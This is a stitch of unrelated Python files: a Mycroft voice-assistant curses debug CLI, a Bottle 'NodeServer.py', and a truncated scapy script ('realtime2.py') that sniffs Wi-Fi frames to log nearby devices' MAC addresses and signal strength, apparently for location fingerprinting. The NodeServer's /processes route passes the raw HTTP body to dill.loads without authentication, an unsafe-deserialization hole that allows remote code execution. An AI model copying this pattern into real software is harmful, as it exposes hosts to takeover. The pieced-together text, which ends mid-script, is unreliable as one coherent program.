if bSimple:
print(line.rstrip())
else:
filteredLog.append(self.logid + line.rstrip())
mergedLog.append(self.logid + line.rstrip())
if not auto_scroll:
log_line_offset += 1
# Limit log to max_log_lines
if len(mergedLog) >= max_log_lines:
with log_lock:
cToDel = len(mergedLog) - max_log_lines
if len(filteredLog) == len(mergedLog):
del filteredLog[:cToDel]
del mergedLog[:cToDel]
# release log_lock before calling to prevent deadlock
if len(filteredLog) != len(mergedLog):
rebuild_filtered_log()
def start_log_monitor(filename):
if os.path.isfile(filename):
thread = LogMonitorThread(filename, len(log_files))
thread.setDaemon(True) # this thread won't prevent prog from exiting
thread.start()
class MicMonitorThread(Thread):
def __init__(self, filename):
Thread.__init__(self)
self.filename = filename
self.st_results = None
def run(self):
while True:
try:
st_results = os.stat(self.filename)
if (not self.st_results or
not st_results.st_ctime == self.st_results.st_ctime or
not st_results.st_mtime == self.st_results.st_mtime):
self.read_mic_level()
self.st_results = st_results
set_screen_dirty()
except Exception:
# Ignore whatever failure happened and just try again later
pass
time.sleep(0.2)
def read_mic_level(self):
global meter_cur
global meter_thresh
with io.open(self.filename, 'r') as fh:
line = fh.readline()
# Just adjust meter settings
# Ex:Energy: cur=4 thresh=1.5 muted=0
cur_text, thresh_text, _ = line.split(' ')[-3:]
meter_thresh = float(thresh_text.split('=')[-1])
meter_cur = float(cur_text.split('=')[-1])
class ScreenDrawThread(Thread):
def __init__(self):
Thread.__init__(self)
def run(self):
global scr
global screen_lock
global is_screen_dirty
global log_lock
while scr:
try:
if is_screen_dirty:
# Use a lock to prevent screen corruption when drawing
# from multiple threads
with screen_lock:
is_screen_dirty = False
if screen_mode == SCR_MAIN:
with log_lock:
do_draw_main(scr)
elif screen_mode == SCR_HELP:
do_draw_help(scr)
finally:
time.sleep(0.01)
def start_mic_monitor(filename):
if os.path.isfile(filename):
thread = MicMonitorThread(filename)
thread.setDaemon(True) # this thread won't prevent prog from exiting
thread.start()
def add_log_message(message):
""" Show a message for the user (mixed in the logs) """
global filteredLog
global mergedLog
global log_line_offset
global log_lock
with log_lock:
message = "@" + message # the first byte is a code
filteredLog.append(message)
mergedLog.append(message)
if log_line_offset != 0:
log_line_offset = 0 # scroll so the user can see the message
set_screen_dirty()
def clear_log():
global filteredLog
global mergedLog
global log_line_offset
global log_lock
with log_lock:
mergedLog = []
filteredLog = []
log_line_offset = 0
def rebuild_filtered_log():
global filteredLog
global mergedLog
global log_lock
with log_lock:
filteredLog = []
for line in mergedLog:
# Apply filters
ignore = False
if find_str and find_str != "":
# Searching log
if find_str not in line:
ignore = True
else:
# Apply filters
for filtered_text in log_filters:
if filtered_text and filtered_text in line:
ignore = True
break
if not ignore:
filteredLog.append(line)
##############################################################################
# Capturing output from Mycroft
def handle_speak(event):
global chat
utterance = event.data.get('utterance')
utterance = TTS.remove_ssml(utterance)
if bSimple:
print(">> " + utterance)
else:
chat.append(">> " + utterance)
set_screen_dirty()
def handle_utterance(event):
global chat
global history
utterance = event.data.get('utterances')[0]
history.append(utterance)
chat.append(utterance)
set_screen_dirty()
def connect(bus):
""" Run the mycroft messagebus referenced by bus.
Args:
bus: Mycroft messagebus instance
"""
bus.run_forever()
##############################################################################
# Capturing the messagebus
def handle_message(msg):
# TODO: Think this thru a little bit -- remove this logging within core?
# add_log_message(msg)
pass
##############################################################################
# "Graphic primitives"
def draw(x, y, msg, pad=None, pad_chr=None, clr=None):
"""Draw a text to the screen
Args:
x (int): X coordinate (col), 0-based from upper-left
y (int): Y coordinate (row), 0-based from upper-left
msg (str): string to render to screen
pad (bool or int, optional): if int, pads/clips to given length, if
True use right edge of the screen.
pad_chr (char, optional): pad character, default is space
clr (int, optional): curses color, Defaults to CLR_LOG1.
"""
if y < 0 or y > curses.LINES or x < 0 or x > curses.COLS:
return
if x + len(msg) > curses.COLS:
s = msg[:curses.COLS - x]
else:
s = msg
if pad:
ch = pad_chr or " "
if pad is True:
pad = curses.COLS # pad to edge of screen
s += ch * (pad - x - len(msg))
else:
# pad to given length (or screen width)
if x + pad > curses.COLS:
pad = curses.COLS - x
s += ch * (pad - len(msg))
if not clr:
clr = CLR_LOG1
scr.addstr(y, x, s, clr)
##############################################################################
# Screen handling
def init_screen():
global CLR_HEADING
global CLR_FIND
global CLR_CHAT_RESP
global CLR_CHAT_QUERY
global CLR_CMDLINE
global CLR_INPUT
global CLR_LOG1
global CLR_LOG2
global CLR_LOG_DEBUG
global CLR_LOG_ERROR
global CLR_LOG_CMDMESSAGE
global CLR_METER_CUR
global CLR_METER
if curses.has_colors():
curses.init_pair(1, curses.COLOR_WHITE, curses.COLOR_BLACK)
bg = curses.COLOR_BLACK
for i in range(1, curses.COLORS):
curses.init_pair(i + 1, i, bg)
# Colors (on black backgound):
# 1 = white 5 = dk blue
# 2 = dk red 6 = dk purple
# 3 = dk green 7 = dk cyan
# 4 = dk yellow 8 = lt gray
CLR_HEADING = curses.color_pair(1)
CLR_CHAT_RESP = curses.color_pair(4)
CLR_CHAT_QUERY = curses.color_pair(7)
CLR_FIND = curses.color_pair(4)
CLR_CMDLINE = curses.color_pair(7)
CLR_INPUT = curses.color_pair(7)
CLR_LOG1 = curses.color_pair(3)
CLR_LOG2 = curses.color_pair(6)
CLR_LOG_DEBUG = curses.color_pair(4)
CLR_LOG_ERROR = curses.color_pair(2)
CLR_LOG_CMDMESSAGE = curses.color_pair(2)
CLR_METER_CUR = curses.color_pair(2)
CLR_METER = curses.color_pair(4)
def scroll_log(up, num_lines=None):
global log_line_offset
# default to a half-page
if not num_lines:
num_lines = size_log_area // 2
with log_lock:
if up:
log_line_offset -= num_lines
else:
log_line_offset += num_lines
if log_line_offset > len(filteredLog):
log_line_offset = len(filteredLog) - 10
if log_line_offset < 0:
log_line_offset = 0
set_screen_dirty()
def _do_meter(height):
if not show_meter or meter_cur == -1:
return
# The meter will look something like this:
#
# 8.4 *
# *
# -*- 2.4
# *
# *
# *
# Where the left side is the current level and the right side is
# the threshold level for 'silence'.
global scr
global meter_peak
if meter_cur > meter_peak:
meter_peak = meter_cur + 1
scale = meter_peak
if meter_peak > meter_thresh * 3:
scale = meter_thresh * 3
h_cur = clamp(int((float(meter_cur) / scale) * height), 0, height - 1)
h_thresh = clamp(
int((float(meter_thresh) / scale) * height), 0, height - 1)
clr = curses.color_pair(4) # dark yellow
str_level = "{0:3} ".format(int(meter_cur)) # e.g. ' 4'
str_thresh = "{0:4.2f}".format(meter_thresh) # e.g. '3.24'
meter_width = len(str_level) + len(str_thresh) + 4
for i in range(0, height):
meter = ""
if i == h_cur:
# current energy level
meter = str_level
else:
meter = " " * len(str_level)
if i == h_thresh:
# add threshold indicator
meter += "--- "
else:
meter += " "
if i == h_thresh:
# 'silence' threshold energy level
meter += str_thresh
# draw the line
meter += " " * (meter_width - len(meter))
scr.addstr(curses.LINES - 1 - i, curses.COLS -
len(meter) - 1, meter, clr)
# draw an asterisk if the audio energy is at this level
if i <= h_cur:
if meter_cur > meter_thresh:
clr_bar = curses.color_pair(3) # dark green for loud
else:
clr_bar = curses.color_pair(5) # dark blue for 'silent'
scr.addstr(curses.LINES - 1 - i, curses.COLS - len(str_thresh) - 4,
"*", clr_bar)
def _do_gui(gui_width):
clr = curses.color_pair(2) # dark red
x = curses.COLS - gui_width
y = 3
draw(
x,
y,
" " +
make_titlebar(
"= GUI",
gui_width -
1) +
" ",
clr=CLR_HEADING)
cnt = len(gui_text) + 1
if cnt > curses.LINES - 15:
cnt = curses.LINES - 15
for i in range(0, cnt):
draw(x, y + 1 + i, " !", clr=CLR_HEADING)
if i < len(gui_text):
draw(x + 2, y + 1 + i, gui_text[i], pad=gui_width - 3)
else:
draw(x + 2, y + 1 + i, "*" * (gui_width - 3))
draw(x + (gui_width - 1), y + 1 + i, "!", clr=CLR_HEADING)
draw(x, y + cnt, " " + "-" * (gui_width - 2) + " ", clr=CLR_HEADING)
def set_screen_dirty():
global is_screen_dirty
global screen_lock
with screen_lock:
is_screen_dirty = True
def do_draw_main(scr):
global log_line_offset
global longest_visible_line
global last_redraw
global auto_scroll
global size_log_area
if time.time() - last_redraw > REDRAW_FREQUENCY:
# Do a full-screen redraw periodically to clear and
# noise from non-curses text that get output to the
# screen (e.g. modules that do a 'print')
scr.clear()
last_redraw = time.time()
else:
scr.erase()
# Display log output at the top
cLogs = len(filteredLog) + 1 # +1 for the '--end--'
size_log_area = curses.LINES - (cy_chat_area + 5)
start = clamp(cLogs - size_log_area, 0, cLogs - 1) - log_line_offset
end = cLogs - log_line_offset
if start < 0:
end -= start
start = 0
if end > cLogs:
end = cLogs
auto_scroll = (end == cLogs)
# adjust the line offset (prevents paging up too far)
log_line_offset = cLogs - end
# Top header and line counts
if find_str:
scr.addstr(0, 0, "Search Results: ", CLR_HEADING)
scr.addstr(0, 16, find_str, CLR_FIND)
scr.addstr(0, 16 + len(find_str), " ctrl+X to end" +
" " * (curses.COLS - 31 - 12 - len(find_str)) +
str(start) + "-" + str(end) + " of " + str(cLogs),
CLR_HEADING)
else:
scr.addstr(0, 0, "Log Output:" + " " * (curses.COLS - 31) +
str(start) + "-" + str(end) + " of " + str(cLogs),
CLR_HEADING)
ver = " mycroft-core " + mycroft.version.CORE_VERSION_STR + " ==="
scr.addstr(1, 0, "=" * (curses.COLS - 1 - len(ver)), CLR_HEADING)
scr.addstr(1, curses.COLS - 1 - len(ver), ver, CLR_HEADING)
y = 2
for i in range(start, end):
if i >= cLogs - 1:
log = ' ^--- NEWEST ---^ '
else:
log = filteredLog[i]
logid = log[0]
if len(log) > 25 and log[5] == '-' and log[8] == '-':
log = log[11:] # skip logid & date at the front of log line
else:
log = log[1:] # just skip the logid
# Categorize log line
if "| DEBUG |" in log:
log = log.replace("Skills ", "")
clr = CLR_LOG_DEBUG
elif "| ERROR |" in log:
clr = CLR_LOG_ERROR
else:
if logid == "1":
clr = CLR_LOG1
elif logid == "@":
clr = CLR_LOG_CMDMESSAGE
else:
clr = CLR_LOG2
# limit output line to screen width
len_line = len(log)
if len(log) > curses.COLS:
start = len_line - (curses.COLS - 4) - log_line_lr_scroll
if start < 0:
start = 0
end = start + (curses.COLS - 4)
if start == 0:
log = log[start:end] + "~~~~" # start....
elif end >= len_line - 1:
log = "~~~~" + log[start:end] # ....end
else:
log = "~~" + log[start:end] + "~~" # ..middle..
if len_line > longest_visible_line:
longest_visible_line = len_line
scr.addstr(y, 0, handleNonAscii(log), clr)
y += 1
# Log legend in the lower-right
y_log_legend = curses.LINES - (3 + cy_chat_area)
scr.addstr(y_log_legend, curses.COLS // 2 + 2,
make_titlebar("Log Output Legend", curses.COLS // 2 - 2),
CLR_HEADING)
scr.addstr(y_log_legend + 1, curses.COLS // 2 + 2,
"DEBUG output",
CLR_LOG_DEBUG)
if len(log_files) > 0:
scr.addstr(y_log_legend + 2, curses.COLS // 2 + 2,
os.path.basename(log_files[0]) + ", other",
CLR_LOG2)
if len(log_files) > 1:
scr.addstr(y_log_legend + 3, curses.COLS // 2 + 2,
os.path.basename(log_files[1]), CLR_LOG1)
# Meter
y_meter = y_log_legend
if show_meter:
scr.addstr(y_meter, curses.COLS - 14, " Mic Level ",
CLR_HEADING)
# History log in the middle
y_chat_history = curses.LINES - (3 + cy_chat_area)
chat_width = curses.COLS // 2 - 2
chat_out = []
scr.addstr(y_chat_history, 0, make_titlebar("History", chat_width),
CLR_HEADING)
# Build a nicely wrapped version of the chat log
idx_chat = len(chat) - 1
while len(chat_out) < cy_chat_area and idx_chat >= 0:
if chat[idx_chat][0] == '>':
wrapper = textwrap.TextWrapper(initial_indent="",
subsequent_indent=" ",
width=chat_width)
else:
wrapper = textwrap.TextWrapper(width=chat_width)
chatlines = wrapper.wrap(chat[idx_chat])
for txt in reversed(chatlines):
if len(chat_out) >= cy_chat_area:
break
chat_out.insert(0, txt)
idx_chat -= 1
# Output the chat
y = curses.LINES - (2 + cy_chat_area)
for txt in chat_out:
if txt.startswith(">> ") or txt.startswith(" "):
clr = CLR_CHAT_RESP
else:
clr = CLR_CHAT_QUERY
scr.addstr(y, 1, handleNonAscii(txt), clr)
y += 1
if show_gui and curses.COLS > 20 and curses.LINES > 20:
_do_gui(curses.COLS - 20)
# Command line at the bottom
ln = line
if len(line) > 0 and line[0] == ":":
scr.addstr(curses.LINES - 2, 0, "Command ('help' for options):",
CLR_CMDLINE)
scr.addstr(curses.LINES - 1, 0, ":", CLR_CMDLINE)
ln = line[1:]
else:
prompt = "Input (':' for command, Ctrl+C to quit)"
if show_last_key:
prompt += " === keycode: " + last_key
scr.addstr(curses.LINES - 2, 0,
make_titlebar(prompt,
curses.COLS - 1),
CLR_HEADING)
scr.addstr(curses.LINES - 1, 0, ">", CLR_HEADING)
_do_meter(cy_chat_area + 2)
scr.addstr(curses.LINES - 1, 2, ln[-(curses.COLS - 3):], CLR_INPUT)
# Curses doesn't actually update the display until refresh() is called
scr.refresh()
def make_titlebar(title, bar_length):
return title + " " + ("=" * (bar_length - 1 - len(title)))
##############################################################################
# Help system
help_struct = [('Log Scrolling shortcuts',
[("Up / Down / PgUp / PgDn",
"scroll thru history"),
("Ctrl+T / Ctrl+PgUp",
"scroll to top of logs (jump to oldest)"),
("Ctrl+B / Ctrl+PgDn",
"scroll to bottom of logs" + "(jump to newest)"),
("Left / Right",
"scroll long lines left/right"),
("Home / End",
"scroll to start/end of long lines")]),
("Query History shortcuts",
[("Ctrl+N / Ctrl+Left",
"previous query"),
("Ctrl+P / Ctrl+Right",
"next query")]),
("General Commands (type ':' to enter command mode)",
[(":quit or :exit",
"exit the program"),
(":meter (show|hide)",
"display the microphone level"),
(":keycode (show|hide)",
"display typed key codes (mainly debugging)"),
(":history (# lines)",
"set size of visible history buffer"),
(":clear",
"flush the logs")]),
("Log Manipulation Commands",
[(":filter 'STR'",
"adds a log filter (optional quotes)"),
(":filter remove 'STR'",
"removes a log filter"),
(":filter (clear|reset)",
"reset filters"),
(":filter (show|list)",
"display current filters"),
(":find 'STR'",
"show logs containing 'str'"),
(":log level (DEBUG|INFO|ERROR)",
"set logging level"),
(":log bus (on|off)",
"control logging of messagebus messages")]),
("Skill Debugging Commands",
[(":skills",
"list installed Skills"),
(":api SKILL",
"show Skill's public API"),
(":activate SKILL",
"activate Skill, e.g. 'activate skill-wiki'"),
(":deactivate SKILL",
"deactivate Skill"),
(":keep SKILL",
"deactivate all Skills except the indicated Skill")])]
help_longest = 0
for s in help_struct:
for ent in s[1]:
help_longest = max(help_longest, len(ent[0]))
HEADER_SIZE = 2
HEADER_FOOTER_SIZE = 4
def num_help_pages():
lines = 0
for section in help_struct:
lines += 3 + len(section[1])
return ceil(lines / (curses.LINES - HEADER_FOOTER_SIZE))
def do_draw_help(scr):
def render_header():
scr.addstr(0, 0, center(25) + "Mycroft Command Line Help", CLR_HEADING)
scr.addstr(1, 0, "=" * (curses.COLS - 1), CLR_HEADING)
def render_help(txt, y_pos, i, first_line, last_line, clr):
if i >= first_line and i < last_line:
scr.addstr(y_pos, 0, txt, clr)
y_pos += 1
return y_pos
def render_footer(page, total):
text = "Page {} of {} [ Any key to continue ]".format(page, total)
scr.addstr(curses.LINES - 1, 0, center(len(text)) + text, CLR_HEADING)
scr.erase()
render_header()
y = HEADER_SIZE
page = subscreen + 1
# Find first and last taking into account the header and footer
first = subscreen * (curses.LINES - HEADER_FOOTER_SIZE)
last = first + (curses.LINES - HEADER_FOOTER_SIZE)
i = 0
for section in help_struct:
y = render_help(section[0], y, i, first, last, CLR_HEADING)
i += 1
y = render_help("=" * (curses.COLS - 1), y, i, first, last,
CLR_HEADING)
i += 1
for line in section[1]:
words = line[1].split()
ln = line[0].ljust(help_longest + 1)
for w in words:
if len(ln) + 1 + len(w) < curses.COLS:
ln += " " + w
else:
y = render_help(ln, y, i, first, last, CLR_CMDLINE)
ln = " ".ljust(help_longest + 2) + w
y = render_help(ln, y, i, first, last, CLR_CMDLINE)
i += 1
y = render_help(" ", y, i, first, last, CLR_CMDLINE)
i += 1
if i > last:
break
render_footer(page, num_help_pages())
# Curses doesn't actually update the display until refresh() is called
scr.refresh()
def show_help():
global screen_mode
global subscreen
if screen_mode != SCR_HELP:
screen_mode = SCR_HELP
subscreen = 0
set_screen_dirty()
def show_next_help():
global screen_mode
global subscreen
if screen_mode == SCR_HELP:
subscreen += 1
if subscreen >= num_help_pages():
screen_mode = SCR_MAIN
set_screen_dirty()
##############################################################################
# Skill debugging
def show_skills(skills):
"""Show list of loaded Skills in as many column as necessary."""
global scr
global screen_mode
if not scr:
return
screen_mode = SCR_SKILLS
row = 2
column = 0
def prepare_page():
global scr
nonlocal row
nonlocal column
scr.erase()
scr.addstr(0, 0, center(25) + "Loaded Skills", CLR_CMDLINE)
scr.addstr(1, 1, "=" * (curses.COLS - 2), CLR_CMDLINE)
row = 2
column = 0
prepare_page()
col_width = 0
skill_names = sorted(skills.keys())
for skill in skill_names:
if skills[skill]['active']:
color = curses.color_pair(4)
else:
color = curses.color_pair(2)
scr.addstr(row, column, " {}".format(skill), color)
row += 1
col_width = max(col_width, len(skill))
if row == curses.LINES - 2 and column > 0 and skill != skill_names[-1]:
column = 0
scr.addstr(curses.LINES - 1, 0,
center(23) + "Press any key to continue", CLR_HEADING)
scr.refresh()
wait_for_any_key()
prepare_page()
elif row == curses.LINES - 2:
# Reached bottom of screen, start at top and move output to a
# New column
row = 2
column += col_width + 2
col_width = 0
if column > curses.COLS - 20:
# End of screen
break
scr.addstr(curses.LINES - 1, 0, center(23) + "Press any key to return",
CLR_HEADING)
scr.refresh()
def show_skill_api(skill, data):
"""Show available help on Skill's API."""
global scr
global screen_mode
if not scr:
return
screen_mode = SCR_SKILLS
row = 2
column = 0
def prepare_page():
global scr
nonlocal row
nonlocal column
scr.erase()
scr.addstr(0, 0, center(25) + "Skill-API for {}".format(skill),
CLR_CMDLINE)
scr.addstr(1, 1, "=" * (curses.COLS - 2), CLR_CMDLINE)
row = 2
column = 4
prepare_page()
for key in data:
color = curses.color_pair(4)
scr.addstr(row, column, "{} ({})".format(key, data[key]['type']),
CLR_HEADING)
row += 2
if 'help' in data[key]:
help_text = data[key]['help'].split('\n')
for line in help_text:
scr.addstr(row, column + 2, line, color)
row += 1
row += 2
else:
row += 1
if row == curses.LINES - 5:
scr.addstr(curses.LINES - 1, 0,
center(23) + "Press any key to continue", CLR_HEADING)
scr.refresh()
wait_for_any_key()
prepare_page()
elif row == curses.LINES - 5:
# Reached bottom of screen, start at top and move output to a
# New column
row = 2
scr.addstr(curses.LINES - 1, 0, center(23) + "Press any key to return",
CLR_HEADING)
scr.refresh()
def center(str_len):
# generate number of characters needed to center a string
# of the given length
return " " * ((curses.COLS - str_len) // 2)
##############################################################################
# Main UI lopo
def _get_cmd_param(cmd, keyword):
# Returns parameter to a command. Will de-quote.
# Ex: find 'abc def' returns: abc def
# find abc def returns: abc def
if isinstance(keyword, list):
for w in keyword:
cmd = cmd.replace(w, "").strip()
else:
cmd = cmd.replace(keyword, "").strip()
if not cmd:
return None
last_char = cmd[-1]
if last_char == '"' or last_char == "'":
parts = cmd.split(last_char)
return parts[-2]
else:
parts = cmd.split(" ")
return parts[-1]
def wait_for_any_key():
"""Block until key is pressed.
This works around curses.error that can occur on old versions of ncurses.
"""
while True:
try:
scr.get_wch() # blocks
except curses.error:
# Loop if get_wch throws error
time.sleep(0.05)
else:
break
def handle_cmd(cmd):
global show_meter
global screen_mode
global log_filters
global cy_chat_area
global find_str
global show_last_key
if "show" in cmd and "log" in cmd:
pass
elif "help" in cmd:
show_help()
elif "exit" in cmd or "quit" in cmd:
return 1
elif "keycode" in cmd:
# debugging keyboard
if "hide" in cmd or "off" in cmd:
show_last_key = False
elif "show" in cmd or "on" in cmd:
show_last_key = True
elif "meter" in cmd:
# microphone level meter
if "hide" in cmd or "off" in cmd:
show_meter = False
elif "show" in cmd or "on" in cmd:
show_meter = True
elif "find" in cmd:
find_str = _get_cmd_param(cmd, "find")
rebuild_filtered_log()
elif "filter" in cmd:
if "show" in cmd or "list" in cmd:
# display active filters
add_log_message("Filters: " + str(log_filters))
return
if "reset" in cmd or "clear" in cmd:
log_filters = list(default_log_filters)
else:
# extract last word(s)
param = _get_cmd_param(cmd, "filter")
if param:
if "remove" in cmd and param in log_filters:
log_filters.remove(param)
else:
log_filters.append(param)
rebuild_filtered_log()
add_log_message("Filters: " + str(log_filters))
elif "clear" in cmd:
clear_log()
elif "log" in cmd:
# Control logging behavior in all Mycroft processes
if "level" in cmd:
level = _get_cmd_param(cmd, ["log", "level"])
bus.emit(Message("mycroft.debug.log", data={'level': level}))
elif "bus" in cmd:
state = _get_cmd_param(cmd, ["log", "bus"]).lower()
if state in ["on", "true", "yes"]:
bus.emit(Message("mycroft.debug.log", data={'bus': True}))
elif state in ["off", "false", "no"]:
bus.emit(Message("mycroft.debug.log", data={'bus': False}))
elif "history" in cmd:
# extract last word(s)
lines = int(_get_cmd_param(cmd, "history"))
if not lines or lines < 1:
lines = 1
max_chat_area = curses.LINES - 7
if lines > max_chat_area:
lines = max_chat_area
cy_chat_area = lines
elif "skills" in cmd:
# List loaded skill
message = bus.wait_for_response(
Message('skillmanager.list'), reply_type='mycroft.skills.list')
if message:
show_skills(message.data)
wait_for_any_key()
screen_mode = SCR_MAIN
set_screen_dirty()
elif "deactivate" in cmd:
skills = cmd.split()[1:]
if len(skills) > 0:
for s in skills:
bus.emit(Message("skillmanager.deactivate", data={'skill': s}))
else:
add_log_message('Usage :deactivate SKILL [SKILL2] [...]')
elif "keep" in cmd:
s = cmd.split()
if len(s) > 1:
bus.emit(Message("skillmanager.keep", data={'skill': s[1]}))
else:
add_log_message('Usage :keep SKILL')
elif "activate" in cmd:
skills = cmd.split()[1:]
if len(skills) > 0:
for s in skills:
bus.emit(Message("skillmanager.activate", data={'skill': s}))
else:
add_log_message('Usage :activate SKILL [SKILL2] [...]')
elif "api" in cmd:
parts = cmd.split()
if len(parts) < 2:
return
skill = parts[1]
message = bus.wait_for_response(Message('{}.public_api'.format(skill)))
if message:
show_skill_api(skill, message.data)
scr.get_wch() # blocks
screen_mode = SCR_MAIN
set_screen_dirty()
# TODO: More commands
return 0 # do nothing upon return
def handle_is_connected(msg):
add_log_message("Connected to Messagebus!")
# start_qml_gui(bus, gui_text)
def handle_reconnecting():
add_log_message("Looking for Messagebus websocket...")
def gui_main(stdscr):
global scr
global bus
global line
global log_line_lr_scroll
global longest_visible_line
global find_str
global last_key
global history
global screen_lock
global show_gui
global config
scr = stdscr
init_screen()
scr.keypad(1)
scr.notimeout(True)
bus.on('speak', handle_speak)
bus.on('message', handle_message)
bus.on('recognizer_loop:utterance', handle_utterance)
bus.on('connected', handle_is_connected)
bus.on('reconnecting', handle_reconnecting)
add_log_message("Establishing Mycroft Messagebus connection...")
gui_thread = ScreenDrawThread()
gui_thread.setDaemon(True) # this thread won't prevent prog from exiting
gui_thread.start()
hist_idx = -1 # index, from the bottom
c = 0
try:
while True:
set_screen_dirty()
c = 0
code = 0
try:
if ctrl_c_pressed():
# User hit Ctrl+C. treat same as Ctrl+X
c = 24
else:
# Don't block, this allows us to refresh the screen while
# waiting on initial messagebus connection, etc
scr.timeout(1)
c = scr.get_wch() # unicode char or int for special keys
if c == -1:
continue
except curses.error:
# This happens in odd cases, such as when you Ctrl+Z
# the CLI and then resume. Curses fails on get_wch().
continue
if isinstance(c, int):
code = c
else:
code = ord(c)
# Convert VT100 ESC codes generated by some terminals
if code == 27:
# NOTE: Not sure exactly why, but the screen can get corrupted
# if we draw to the screen while doing a scr.getch(). So
# lock screen updates until the VT100 sequence has been
# completely read.
with screen_lock:
scr.timeout(0)
c1 = -1
start = time.time()
while c1 == -1:
c1 = scr.getch()
if time.time() - start > 1:
break # 1 second timeout waiting for ESC code
c2 = -1
while c2 == -1:
c2 = scr.getch()
if time.time() - start > 1: # 1 second timeout
break # 1 second timeout waiting for ESC code
if c1 == 79 and c2 == 120:
c = curses.KEY_UP
elif c1 == 79 and c2 == 116:
c = curses.KEY_LEFT
elif c1 == 79 and c2 == 114:
c = curses.KEY_DOWN
elif c1 == 79 and c2 == 118:
c = curses.KEY_RIGHT
elif c1 == 79 and c2 == 121:
c = curses.KEY_PPAGE # aka PgUp
elif c1 == 79 and c2 == 115:
c = curses.KEY_NPAGE # aka PgDn
elif c1 == 79 and c2 == 119:
c = curses.KEY_HOME
elif c1 == 79 and c2 == 113:
c = curses.KEY_END
else:
c = c1
if c1 != -1:
last_key = str(c) + ",ESC+" + str(c1) + "+" + str(c2)
code = c
else:
last_key = "ESC"
else:
if code < 33:
last_key = str(code)
else:
last_key = str(code)
scr.timeout(-1) # resume blocking
if code == 27: # Hitting ESC twice clears the entry line
hist_idx = -1
line = ""
elif c == curses.KEY_RESIZE:
# Generated by Curses when window/screen has been resized
y, x = scr.getmaxyx()
curses.resizeterm(y, x)
# resizeterm() causes another curses.KEY_RESIZE, so
# we need to capture that to prevent a loop of resizes
c = scr.get_wch()
elif screen_mode == SCR_HELP:
# in Help mode, any key goes to next page
show_next_help()
continue
elif c == '\n' or code == 10 or code == 13 or code == 343:
# ENTER sends the typed line to be processed by Mycroft
if line == "":
continue
if line[:1] == ":":
# Lines typed like ":help" are 'commands'
if handle_cmd(line[1:]) == 1:
break
else:
# Treat this as an utterance
bus.emit(Message("recognizer_loop:utterance",
{'utterances': [line.strip()],
'lang': config.get('lang', 'en-us')},
{'client_name': 'mycroft_cli',
'source': 'debug_cli',
'destination': ["skills"]}
))
hist_idx = -1
line = ""
elif code == 16 or code == 545: # Ctrl+P or Ctrl+Left (Previous)
# Move up the history stack
hist_idx = clamp(hist_idx + 1, -1, len(history) - 1)
if hist_idx >= 0:
line = history[len(history) - hist_idx - 1]
else:
line = ""
elif code == 14 or code == 560: # Ctrl+N or Ctrl+Right (Next)
# Move down the history stack
hist_idx = clamp(hist_idx - 1, -1, len(history) - 1)
if hist_idx >= 0:
line = history[len(history) - hist_idx - 1]
else:
line = ""
elif c == curses.KEY_LEFT:
# scroll long log lines left
log_line_lr_scroll += curses.COLS // 4
elif c == curses.KEY_RIGHT:
# scroll long log lines right
log_line_lr_scroll -= curses.COLS // 4
if log_line_lr_scroll < 0:
log_line_lr_scroll = 0
elif c == curses.KEY_HOME:
# HOME scrolls log lines all the way to the start
log_line_lr_scroll = longest_visible_line
elif c == curses.KEY_END:
# END scrolls log lines all the way to the end
log_line_lr_scroll = 0
elif c == curses.KEY_UP:
scroll_log(False, 1)
elif c == curses.KEY_DOWN:
scroll_log(True, 1)
elif c == curses.KEY_NPAGE: # aka PgDn
# PgDn to go down a page in the logs
scroll_log(True)
elif c == curses.KEY_PPAGE: # aka PgUp
# PgUp to go up a page in the logs
scroll_log(False)
elif code == 2 or code == 550: # Ctrl+B or Ctrl+PgDn
scroll_log(True, max_log_lines)
elif code == 20 or code == 555: # Ctrl+T or Ctrl+PgUp
scroll_log(False, max_log_lines)
elif code == curses.KEY_BACKSPACE or code == 127:
# Backspace to erase a character in the utterance
line = line[:-1]
elif code == 6: # Ctrl+F (Find)
line = ":find "
elif code == 7: # Ctrl+G (start GUI)
if show_gui is None:
start_qml_gui(bus, gui_text)
show_gui = not show_gui
elif code == 18: # Ctrl+R (Redraw)
scr.erase()
elif code == 24: # Ctrl+X (Exit)
if find_str:
# End the find session
find_str = None
rebuild_filtered_log()
elif line.startswith(":"):
# cancel command mode
line = ""
else:
# exit CLI
break
elif code > 31 and isinstance(c, str):
# Accept typed character in the utterance
line += c
finally:
scr.erase()
scr.refresh()
scr = None
def simple_cli():
global bSimple
bSimple = True
bus.on('speak', handle_speak)
try:
while True:
# Sleep for a while so all the output that results
# from the previous command finishes before we print.
time.sleep(1.5)
print("Input (Ctrl+C to quit):")
line = sys.stdin.readline()
bus.emit(Message("recognizer_loop:utterance",
{'utterances': [line.strip()]},
{'client_name': 'mycroft_simple_cli',
'source': 'debug_cli',
'destination': ["skills"]}))
except KeyboardInterrupt as e:
# User hit Ctrl+C to quit
print("")
except KeyboardInterrupt as e:
LOG.exception(e)
event_thread.exit()
sys.exit()
def connect_to_messagebus():
""" Connect to the mycroft messagebus and launch a thread handling the
connection.
Returns: WebsocketClient
"""
bus = MessageBusClient() # Mycroft messagebus connection
event_thread = Thread(target=connect, args=[bus])
event_thread.setDaemon(True)
event_thread.start()
return bus
|
NodeServer.py
|
from bottle import route, run, request
import dill
import threading
node = None
@route('/conf', method='POST')
def put_conf():
data = request.body.read()
conn = data.split(',')
node.set_master(conn[0], int(conn[1]))
print "POST on node server to set master conn {0}:{1}".format(conn[0], conn[1])
@route('/processes/:id', method='GET')
def get_process(id):
print "GET on node server to get process port"
print "process: " + id
print "port: " + str(node.get_process_port(int(id)))
return str(node.get_process_port(int(id)))
@route('/processes', method='POST')
def put_process():
process = dill.loads(request.body.read())
node.add_process(process)
print "POST on node server to add process {0}".format(process.id)
@route('/start', method='POST')
def start():
print "POST on node server to start processes"
node.start()
def run_server(n):
global node
node = n
#run(host='localhost', port=n.port, debug=True)
threading.Thread(target=run, kwargs=dict(host=n.host, port=n.port)).start()
|
realtime2.py
|
import re
import os
import kirk
import numpy as n
import time
import pickle
import threading
import thread
import scapy.all as sca
import scapy_ex
import channel_hop
def trimmean(arr, percent):
n = len(arr)
k = int(round(n*(float(percent)/100)/2))
return n.mean(arr[k+1:n-k])
def parsePacket(pkt):
if pkt.haslayer(sca.Dot11):
if pkt.addr2 is not None:
return pkt.addr2, pkt.dBm_AntSignal
return None, None
File = kirk.File
width = kirk.width
height = kirk.height
box_size = kirk.box_size
# Start channel hopping
iface = channel_hop.get_mon_iface()
hop = threading.Thread(target=channel_hop.channel_hop, args=[iface])
hop.daemon = True
hop.start()
fingerprint_file = open(r'fingerprint.pkl', 'rb')
